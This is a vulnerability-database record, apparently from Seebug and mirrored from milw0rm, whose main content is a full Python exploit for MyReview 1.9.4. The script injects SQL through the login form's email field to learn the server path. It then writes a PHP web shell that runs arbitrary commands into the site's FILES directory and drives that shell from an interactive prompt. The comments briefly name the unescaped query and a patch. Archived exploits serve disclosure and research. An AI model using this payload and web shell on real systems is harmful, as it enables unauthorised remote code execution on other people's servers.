{"id": "SSV:16531", "type": "seebug", "bulletinFamily": "exploit", "title": "MyReview 1.9.4 (email) Remote SQL Injection / Code Execution Exploit", "description": "No description provided by source.", "published": "2006-09-19T00:00:00", "modified": "2006-09-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.seebug.org/vuldb/ssvid-16531", "reporter": "Root", "references": [], "cvelist": [], "lastseen": "2017-11-19T22:27:16", "history": [], "viewCount": 0, "enchantments": {"vulnersScore": 7.5}, "enchantments_done": [], "objectVersion": "1.4", "sourceHref": "https://www.seebug.org/vuldb/ssvid-16531", "sourceData": "\n # MyReview 1.9.4 SQL Injection exploit\n#\n#\n# http://myreview.lri.fr/\n#\n# in functions.php starting from line 382\n# ............\t\n#\tfunction GetMember ($email, $db, $mode="array")\n#\t{\n# \t\t$query = "SELECT * FROM PCMember WHERE email = '$email'" ;\n#\t\tresult = $db->execRequete ($query);\n# .......... \n# \n# $email is not checked before used into $query\n# \n# for patch \n# \n# 1. add "$email=addslashes(trim($email));" before $query\n# 2. use something else, very buggy script\n#\n# by STILPU (dmooray[a lu']gmail.com)\n#\n\n\nimport httplib, urllib, re, urlparse, sys\n\ndef usage():\n\tprint """\nMyReview 1.9.4 SQL Injection exploit\n\nUsage: python exploit.py http://target/pathtomyreview/\n\nRequires warnings to be displayed so we cat get the localpath and FILES/ to be writable\n\nby STILPU (dmooray[a lu']gmail.com)\n\n"""\n\tsys.exit(1)\n\ndef getlocalpath(server):\n\tparams=urllib.urlencode({'email':'\\'','motDePasse':'a','ident':'Log in'})\n\theaders={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}\n\tcon = httplib.HTTPConnection(server)\n\tcon.request("POST",path+"Admin.php",params,headers)\n\tresp=con.getresponse()\n\tdata=resp.read()\n\ttry:\n\t\tlocalpath=re.search('>/.*B',data[0:10000]).group().replace('>','',1).replace('B','',1)\t\n\texcept Exception: print "Exploit failed: didn`t manage to get localpath"; sys.exit(1)\n\treturn localpath\n\t\ndef sendshell(server):\n\tshell="'<?php error_reporting(0); ini_set(\\"max_execution_time\\",0); system($_GET[cmd]); /*'"\n\tsql="' union select " + shell + ",0,0,0,'*/ ?>' into outfile '" +getlocalpath(server)+ "FILES/STILPU.php' from PCMember#"\n\theaders={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}\n\tparams=urllib.urlencode({'email':sql,'motDePasse':'a','ident':'Log in'})\n\tcon = httplib.HTTPConnection(server)\n\tcon.request("POST",path+"Admin.php",params,headers)\n\ndef sendcmd(server):\n\twhile 1:\n\t\ttry:\n\t\t\tcmd=raw_input('sh$ ')\n\t\t\tcmd=cmd.replace(" ","+")\n\t\t\tcon = httplib.HTTPConnection(target)\n\t\t\tcon.request("GET",path+"FILES/STILPU.php?cmd="+cmd)\n\t\t\tresp=con.getresponse()\n\t\t\tdata=resp.read()\n\t\t\tif (cmd=="exit" or cmd=="quit"): break\n\t\t\tprint data\n\t\texcept KeyboardInterrupt: break\t\n\n\nif __name__ == '__main__':\n\n\tif len(sys.argv) < 2:\n\t\tusage()\t\t\n\t\n\telse:\n\t\turl = sys.argv[1]\n\t\turl = urlparse.urlsplit(url)\n\t\ttarget = url[1]\n\t\tpath = url[2]\n\t\t\n\t\tsendshell(target)\n\t\tsendcmd(target)\n\n# milw0rm.com [2006-09-19]\n\n ", "status": "poc", "_object_type": "robots.models.seebug.SeebugBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"]}

{"result": {}}